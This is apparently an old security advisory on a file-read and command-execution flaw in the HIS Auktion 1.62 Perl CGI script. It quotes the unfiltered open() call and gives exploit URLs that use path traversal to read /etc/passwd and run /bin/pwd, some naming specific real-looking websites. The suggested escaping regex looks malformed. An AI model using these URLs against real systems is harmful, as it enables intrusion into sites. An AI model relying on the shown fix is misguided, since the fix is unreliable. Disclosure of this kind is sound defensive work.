|
Vulnerability Auktion Affected HIS Auktion 1.62 Description Following is based on a UkR security team advisory #8. Script "HIS Auktion 1.62" is a catalog of links CGI script. Problem: -------from auktion.pl------- sub readfile { local($filename)=$_0; local(@array); open(f,$filename); ---------------------------- $filename - is not filterred on symbols. Exploit: http://www.victim.com/cgi-bin/auktion.pl?menue=path/to/any/file/or/command http://www.zimmerauktion.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd http://www.chess-international.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd Solution To fix the bug yo need to add variable $filename check to the script. For example: $filename=~s/(\[\]\;\:\/\$\!\$\&\`\\\(\)\{\}\")/\\$1/g;